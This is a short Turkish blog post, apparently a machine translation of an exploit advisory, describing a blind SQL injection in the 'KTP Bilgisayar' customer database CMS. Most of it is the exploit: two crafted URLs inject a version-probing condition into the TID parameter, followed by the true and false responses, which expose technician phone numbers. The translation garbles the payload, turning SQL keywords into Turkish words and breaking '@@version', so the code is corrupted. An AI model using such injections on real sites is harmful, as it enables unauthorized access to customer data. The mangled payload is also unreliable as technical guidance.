KTP Bilgisayar Müşteri Veritabanı CMS Blind SQL Injection Güvenlik Açığı



— Blind SQL Injection —

Giriş kullanıcı ya da Kayıt olarak http:// yazılar [hedef] / [ktp_path] /? P = teknoloji & a = ntech sonra Exploit …

———
Exploit
———

Test Blind SQL Injection MYSQL Sürüm 5

[!] Doğru
[+] Http:// [hedef] / [ktp_path] /? P = teknoloji & a = vtech & TID = 1% 27% 20and% 20substring (sürüm, 1,1) = 5 @ –

Sonuç
Ev Telefonu: 122-131-3123
Cep Telefonu: 123-123-3123
Faks No: 123-213-1321
A + Certifcation numarası: 312

[!] Yanlış
[+] Http:// [hedef] / [ktp_path] /? P = teknoloji & a = vtech & TID = 1% 27% 20and% 20substring (sürüm, 1,1) = 4 @ @ –

Sonuç
Ev Telefonu: n / a
Cep Telefonu: n / a
Faks Numarası: n / a
A + Certifcation numarası: (Teknisyen) onaylı olmayan

Hiç yorum yok:

Yorum Gönder